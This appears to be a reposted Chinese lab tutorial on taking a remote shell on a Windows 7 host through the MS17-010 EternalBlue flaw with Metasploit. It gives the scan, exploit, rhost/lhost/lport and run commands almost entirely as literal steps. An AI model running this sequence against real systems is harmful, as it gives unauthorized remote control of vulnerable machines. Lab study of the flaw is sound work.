攻击机: 192.168.148.132 kali linux2018.2 x64
靶机: 192.168.1.129 win7 x64
首先用 msfconsole 的 smb 模块扫描, 看看是否有漏洞
- use auxiliary/scanner/smb/smb_ms17_010
- set rhosts 192.168.1.129 (目标主机)
Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona
表示这个主机存在这个漏洞
1 search ms17_010 搜索这个漏洞
2 use exploit/Windows/smb/ms17_010_eternalblue
利用这个漏洞
3 show options
msf exploit(Windows/smb/ms17_010_eternalblue)> set rhost 192.168.1.129 目标主机
rhost => 192.168.1.129
msf exploit(Windows/smb/ms17_010_eternalblue)> set lhost 192.168.1.132 攻击者主机
lhost => 192.168.1.132
msf exploit(Windows/smb/ms17_010_eternalblue)> set lport 8888 监听端口 (这个可以随意, 但要大于 2000, 个人认为)
run 开始攻击 这个表示拿 shell 成功了
来源: http://www.bubuko.com/infodetail-2949031.html